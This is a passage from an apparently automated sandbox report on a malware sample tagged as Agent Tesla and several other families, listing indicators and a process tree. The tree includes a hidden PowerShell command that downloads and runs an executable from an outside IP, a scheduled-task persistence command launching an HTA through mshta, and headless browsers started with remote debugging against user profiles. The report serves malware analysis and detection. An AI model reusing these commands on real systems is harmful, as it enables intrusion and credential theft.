pid Process 1560 chrome.exe 1560 chrome.exe 1560 chrome.exe 1560 chrome.exe 6044 msedge.exe 6044 msedge.exe 6044 msedge.exe 6044 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3636 powershell.exe Token: SeDebugPrivilege 2912 ibC8xs1.exe Token: SeDebugPrivilege 1272 exp.exe Token: SeDebugPrivilege 1776 MSBuild.exe Token: SeDebugPrivilege 1776 MSBuild.exe Token: SeDebugPrivilege 1776 MSBuild.exe Token: SeDebugPrivilege 1776 MSBuild.exe Token: SeDebugPrivilege 1776 MSBuild.exe Token: SeDebugPrivilege 1776 MSBuild.exe Token: SeDebugPrivilege 1776 MSBuild.exe Token: SeDebugPrivilege 1776 MSBuild.exe Token: SeDebugPrivilege 1776 MSBuild.exe Token: SeDebugPrivilege 1776 MSBuild.exe Token: SeDebugPrivilege 1776 MSBuild.exe Token: SeDebugPrivilege 1776 MSBuild.exe Token: SeDebugPrivilege 1776 MSBuild.exe Token: SeDebugPrivilege 1776 MSBuild.exe Token: SeDebugPrivilege 1776 MSBuild.exe Token: SeDebugPrivilege 1776 MSBuild.exe Token: SeDebugPrivilege 1776 MSBuild.exe Token: SeDebugPrivilege 1776 MSBuild.exe Token: SeDebugPrivilege 1776 MSBuild.exe Token: SeDebugPrivilege 1776 MSBuild.exe Token: SeDebugPrivilege 1776 MSBuild.exe Token: SeDebugPrivilege 2836 DgQBvwg.exe Token: SeShutdownPrivilege 4580 msiexec.exe Token: SeIncreaseQuotaPrivilege 4580 msiexec.exe Token: SeSecurityPrivilege 3152 msiexec.exe Token: SeCreateTokenPrivilege 4580 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4580 msiexec.exe Token: SeLockMemoryPrivilege 4580 msiexec.exe Token: SeIncreaseQuotaPrivilege 4580 msiexec.exe Token: SeMachineAccountPrivilege 4580 msiexec.exe Token: SeTcbPrivilege 4580 msiexec.exe Token: SeSecurityPrivilege 4580 msiexec.exe Token: SeTakeOwnershipPrivilege 4580 msiexec.exe Token: SeLoadDriverPrivilege 4580 msiexec.exe Token: SeSystemProfilePrivilege 4580 msiexec.exe Token: SeSystemtimePrivilege 4580 msiexec.exe Token: SeProfSingleProcessPrivilege 4580 msiexec.exe Token: SeIncBasePriorityPrivilege 4580 msiexec.exe Token: SeCreatePagefilePrivilege 4580 msiexec.exe Token: SeCreatePermanentPrivilege 4580 msiexec.exe Token: SeBackupPrivilege 4580 msiexec.exe Token: SeRestorePrivilege 4580 msiexec.exe Token: SeShutdownPrivilege 4580 msiexec.exe Token: SeDebugPrivilege 4580 msiexec.exe Token: SeAuditPrivilege 4580 msiexec.exe Token: SeSystemEnvironmentPrivilege 4580 msiexec.exe Token: SeChangeNotifyPrivilege 4580 msiexec.exe Token: SeRemoteShutdownPrivilege 4580 msiexec.exe Token: SeUndockPrivilege 4580 msiexec.exe Token: SeSyncAgentPrivilege 4580 msiexec.exe Token: SeEnableDelegationPrivilege 4580 msiexec.exe Token: SeManageVolumePrivilege 4580 msiexec.exe Token: SeImpersonatePrivilege 4580 msiexec.exe Token: SeCreateGlobalPrivilege 4580 msiexec.exe Token: SeRestorePrivilege 3152 msiexec.exe Token: SeTakeOwnershipPrivilege 3152 msiexec.exe Token: SeRestorePrivilege 3152 msiexec.exe Token: SeTakeOwnershipPrivilege 3152 msiexec.exe Token: SeDebugPrivilege 1776 MSBuild.exe Token: SeRestorePrivilege 3152 msiexec.exe Token: SeTakeOwnershipPrivilege 3152 msiexec.exe -
Suspicious use of FindShellTrayWindow 23 IoCs
pid Process 3736 2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3736 2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3736 2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 4500 rundll32.exe 1700 rundll32.exe 1776 MSBuild.exe 1560 chrome.exe 5924 rundll32.exe 6044 msedge.exe 6044 msedge.exe 5380 rundll32.exe 3816 rundll32.exe 440 rundll32.exe 5264 rundll32.exe 1732 rundll32.exe 2888 rundll32.exe 4244 rundll32.exe 1008 rundll32.exe 5724 rundll32.exe 7884 rundll32.exe 6344 rundll32.exe 6824 rundll32.exe 8608 rundll32.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 3736 2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3736 2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3736 2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1776 MSBuild.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3736 wrote to memory of 4172 3736 2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 3736 wrote to memory of 4172 3736 2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 3736 wrote to memory of 4172 3736 2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 3736 wrote to memory of 1508 3736 2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 3736 wrote to memory of 1508 3736 2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 3736 wrote to memory of 1508 3736 2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 4172 wrote to memory of 2304 4172 cmd.exe 89 PID 4172 wrote to memory of 2304 4172 cmd.exe 89 PID 4172 wrote to memory of 2304 4172 cmd.exe 89 PID 1508 wrote to memory of 3636 1508 mshta.exe 91 PID 1508 wrote to memory of 3636 1508 mshta.exe 91 PID 1508 wrote to memory of 3636 1508 mshta.exe 91 PID 3636 wrote to memory of 436 3636 powershell.exe 97 PID 3636 wrote to memory of 436 3636 powershell.exe 97 PID 3636 wrote to memory of 436 3636 powershell.exe 97 PID 436 wrote to memory of 848 436 TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE 100 PID 436 wrote to memory of 848 436 TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE 100 PID 436 wrote to memory of 848 436 TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE 100 PID 848 wrote to memory of 2912 848 rapes.exe 104 PID 848 wrote to memory of 2912 848 rapes.exe 104 PID 2912 wrote to memory of 3648 2912 ibC8xs1.exe 105 PID 2912 wrote to memory of 3648 2912 ibC8xs1.exe 105 PID 3648 wrote to memory of 1324 3648 csc.exe 107 PID 3648 wrote to memory of 1324 3648 csc.exe 107 PID 2912 wrote to memory of 1776 2912 ibC8xs1.exe 108 PID 2912 wrote to memory of 1776 2912 ibC8xs1.exe 108 PID 2912 wrote to memory of 1776 2912 ibC8xs1.exe 108 PID 2912 wrote to memory of 1776 2912 ibC8xs1.exe 108 PID 2912 wrote to memory of 1776 2912 ibC8xs1.exe 108 PID 2912 wrote to memory of 1776 2912 ibC8xs1.exe 108 PID 2912 wrote to memory of 1776 2912 ibC8xs1.exe 108 PID 2912 wrote to memory of 1776 2912 ibC8xs1.exe 108 PID 2912 wrote to memory of 1776 2912 ibC8xs1.exe 108 PID 2912 wrote to memory of 1776 2912 ibC8xs1.exe 108 PID 2912 wrote to memory of 1776 2912 ibC8xs1.exe 108 PID 2912 wrote to memory of 1776 2912 ibC8xs1.exe 108 PID 2912 wrote to memory of 1776 2912 ibC8xs1.exe 108 PID 2912 wrote to memory of 1776 2912 ibC8xs1.exe 108 PID 1892 wrote to memory of 980 1892 cmd.exe 111 PID 1892 wrote to memory of 980 1892 cmd.exe 111 PID 392 wrote to memory of 1272 392 explorer.exe 113 PID 392 wrote to memory of 1272 392 explorer.exe 113 PID 1272 wrote to memory of 1416 1272 exp.exe 115 PID 1272 wrote to memory of 1416 1272 exp.exe 115 PID 1416 wrote to memory of 548 1416 csc.exe 117 PID 1416 wrote to memory of 548 1416 csc.exe 117 PID 1272 wrote to memory of 888 1272 exp.exe 118 PID 1272 wrote to memory of 888 1272 exp.exe 118 PID 1272 wrote to memory of 888 1272 exp.exe 118 PID 1272 wrote to memory of 4248 1272 exp.exe 119 PID 1272 wrote to memory of 4248 1272 exp.exe 119 PID 1272 wrote to memory of 4248 1272 exp.exe 119 PID 1272 wrote to memory of 4248 1272 exp.exe 119 PID 1272 wrote to memory of 4248 1272 exp.exe 119 PID 1272 wrote to memory of 4248 1272 exp.exe 119 PID 1272 wrote to memory of 4248 1272 exp.exe 119 PID 1272 wrote to memory of 4248 1272 exp.exe 119 PID 1272 wrote to memory of 4248 1272 exp.exe 119 PID 1272 wrote to memory of 4248 1272 exp.exe 119 PID 1272 wrote to memory of 4248 1272 exp.exe 119 PID 1272 wrote to memory of 4248 1272 exp.exe 119 PID 1272 wrote to memory of 4248 1272 exp.exe 119 PID 1272 wrote to memory of 4248 1272 exp.exe 119 PID 848 wrote to memory of 2836 848 rapes.exe 122 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3736 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn e1Xh5maqfmY /tr "mshta C:\Users\Admin\AppData\Local\Temp\73ZfHCr0l.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4172 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn e1Xh5maqfmY /tr "mshta C:\Users\Admin\AppData\Local\Temp\73ZfHCr0l.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2304
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\73ZfHCr0l.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1508 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3636 -
C:\Users\Admin\AppData\Local\TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE"C:\Users\Admin\AppData\Local\TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:436 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:848 -
C:\Users\Admin\AppData\Local\Temp\10480540101\ibC8xs1.exe"C:\Users\Admin\AppData\Local\Temp\10480540101\ibC8xs1.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\um5bn14s\um5bn14s.cmdline"7⤵
- Suspicious use of WriteProcessMemory
PID:3648 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDD6.tmp" "c:\Users\Admin\AppData\Local\Temp\um5bn14s\CSCF196E86944004C4E9B2511622423A2F9.TMP"8⤵PID:1324
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- Downloads MZ/PE file
- Accesses Microsoft Outlook accounts
- Accesses Microsoft Outlook profiles
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:1776 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:4500
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:1700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe--restore-last-session --remote-debugging-port=9223 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"8⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:1560 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x104,0x108,0x10c,0x100,0x7c,0x7ff83a95dcf8,0x7ff83a95dd04,0x7ff83a95dd109⤵PID:4000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2004,i,9361191641412909778,2619622656377567075,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1996 /prefetch:29⤵PID:700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2248,i,9361191641412909778,2619622656377567075,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2244 /prefetch:39⤵PID:872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2384,i,9361191641412909778,2619622656377567075,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2380 /prefetch:89⤵PID:1596
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3264,i,9361191641412909778,2619622656377567075,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3260 /prefetch:19⤵
- Uses browser remote debugging
PID:4008
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3288,i,9361191641412909778,2619622656377567075,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3284 /prefetch:19⤵
- Uses browser remote debugging
PID:1756
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4244,i,9361191641412909778,2619622656377567075,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4252 /prefetch:29⤵
- Uses browser remote debugging
PID:1100
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4612,i,9361191641412909778,2619622656377567075,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4432 /prefetch:19⤵
- Uses browser remote debugging
PID:5196
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:5924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe--restore-last-session --remote-debugging-port=9225 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default"8⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:6044 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x264,0x7ff83b90f208,0x7ff83b90f214,0x7ff83b90f2209⤵PID:6072
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1988,i,2724790333369867357,17091601556602995792,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1972 /prefetch:29⤵PID:5316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2320,i,2724790333369867357,17091601556602995792,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2316 /prefetch:39⤵PID:5392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2668,i,2724790333369867357,17091601556602995792,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2664 /prefetch:89⤵PID:212
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3608,i,2724790333369867357,17091601556602995792,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3600 /prefetch:19⤵
- Uses browser remote debugging
PID:5716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3620,i,2724790333369867357,17091601556602995792,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3604 /prefetch:19⤵
- Uses browser remote debugging
PID:5708
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4316,i,2724790333369867357,17091601556602995792,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4312 /prefetch:19⤵
- Uses browser remote debugging
PID:5732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --extension-process --renderer-sub-type=extension --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4332,i,2724790333369867357,17091601556602995792,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4320 /prefetch:29⤵
- Uses browser remote debugging
PID:1416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=3744,i,2724790333369867357,17091601556602995792,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3732 /prefetch:89⤵PID:5272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5160,i,2724790333369867357,17091601556602995792,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5140 /prefetch:89⤵PID:5540
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:5380
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:3816
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:440
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:5264
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:1732
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:2888
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:4244
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:1008
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:5724
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:7884
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:6344
-
-
